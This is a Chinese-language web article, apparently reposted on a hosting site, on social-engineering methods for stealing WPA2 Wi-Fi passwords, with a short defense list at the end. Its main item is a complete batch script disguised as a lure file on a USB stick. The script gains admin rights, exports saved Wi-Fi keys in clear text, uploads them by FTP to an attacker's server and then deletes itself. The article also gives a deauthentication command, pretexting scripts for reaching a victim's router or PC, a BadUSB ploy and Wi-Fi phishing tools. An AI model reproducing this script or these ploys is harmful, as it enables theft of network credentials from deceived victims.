常见社工破解WPA2密码方法及防范措施

1. 前言

何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子。

2. 移动存储攻击

某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:

  1. @echo off  
  2. >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"  
  3. if '%errorlevel%' NEQ '0' (  
  4. goto UACPrompt  
  5. ) else ( goto gotAdmin )  
  6. :UACPrompt  
  7. echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"  
  8. echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"  
  9. "%temp%\getadmin.vbs"  
  10. exit /B  
  11. :gotAdmin  
  12. if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )  
  13. md c:\win  
  14. netsh wlan export profile key=clear folder=c:\win  
  15. echo open 服务器ip>C:\config.txt  
  16. echo user 账号>>C:\config.txt  
  17. echo 密码>>C:\config.txt  
  18. echo mput c:\win\*.xml>>C:\config.txt  
  19. echo yes>>C:\config.txt  
  20. echo yes>>C:\config.txt  
  21. echo yes>>C:\config.txt  
  22. echo yes>>C:\config.txt  
  23. echo yes>>C:\config.txt  
  24. echo yes>>C:\config.txt  
  25. echo yes>>C:\config.txt  
  26. echo yes>>C:\config.txt  
  27. echo yes>>C:\config.txt  
  28. echo yes>>C:\config.txt  
  29. echo yes>>C:\config.txt  
  30. echo yes>>C:\config.txt  
  31. echo yes>>C:\config.txt  
  32. echo yes>>C:\config.txt  
  33. echo yes>>C:\config.txt  
  34. echo yes>>C:\config.txt  
  35. echo yes>>C:\config.txt  
  36. echo yes>>C:\config.txt  
  37. echo yes>>C:\config.txt  
  38. echo yes>>C:\config.txt  
  39. echo yes>>C:\config.txt  
  40. echo yes>>C:\config.txt  
  41. echo yes>>C:\config.txt  
  42. echo yes>>C:\config.txt  
  43. echo yes>>C:\config.txt  
  44. echo yes>>C:\config.txt  
  45. echo yes>>C:\config.txt  
  46. echo yes>>C:\config.txt  
  47. echo yes>>C:\config.txt  
  48. echo yes>>C:\config.txt  
  49. echo yes>>C:\config.txt  
  50. echo yes>>C:\config.txt  
  51. echo yes>>C:\config.txt  
  52. echo yes>>C:\config.txt  
  53. echo yes>>C:\config.txt  
  54. echo yes>>C:\config.txt  
  55. echo yes>>C:\config.txt  
  56. echo yes>>C:\config.txt  
  57. echo yes>>C:\config.txt  
  58. echo yes>>C:\config.txt  
  59. echo yes>>C:\config.txt  
  60. echo yes>>C:\config.txt  
  61. echo yes>>C:\config.txt  
  62. echo yes>>C:\config.txt  
  63. echo yes>>C:\config.txt  
  64. echo yes>>C:\config.txt  
  65. echo yes>>C:\config.txt  
  66. echo yes>>C:\config.txt 
  67. echo yes>>C:\config.txt  
  68. echo yes>>C:\config.txt  
  69. echo yes>>C:\config.txt  
  70. echo yes>>C:\config.txt  
  71. echo yes>>C:\config.txt  
  72. echo bye>>C:\config.txt  
  73. ftp -n -s:"C:\config.txt"  
  74. del C:\config.txt  
  75. del C:\win\*.xml  
  76. del %0 

这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。

攻击演示:

打开此脚本

弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失

查看ftp服务器

wifi信息已经put上来了

进入服务器打开一个xml文件

就拿到了密码

可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。

3. 直接接触受害者

(1) 使用Deauthentication攻击

  1. aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0 

在下班休息的时候(这个时候普遍在使用网络)对受害者使用断网攻击,等一小时后去敲门,询问网络是否故障,询问网络是哪家公司配置的,然后声称自己的网络也故障了,是一样的公司,然后询问报修电话并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复网络的假象,然后撤退。

(2) 结合移动存储攻击,配合badusb,谎称有重要文件需要发送然而手机没电了,家里人还没下班。第一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badusb,执行bat脚本或木马

(3) 谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码

4. wifi钓鱼

利用fluxion、wifiphisher等工具实施钓鱼攻击:

  • https://github.com/FluxionNetwork/fluxion
  • https://github.com/sophron/wifiphisher ——项目地址

它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:

受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。

4. 防御措施

  • 绑定mac地址,设置白名单,只允许自己的机器连接wifi
  • 隐藏wifi广播,避免自己成为目标
  • 不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
  • 尽量不让陌生人接触到自己的设备
  • wifi最好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
  • 定期更换路由器管理界面密码和wifi密码
  • 最好关闭路由器上的wps功能
  • 尽量不使用wifi万能钥匙等类似软件

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/121415.html<

(0)
运维的头像运维
上一篇2025-02-21 21:04
下一篇 2025-02-21 21:05

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注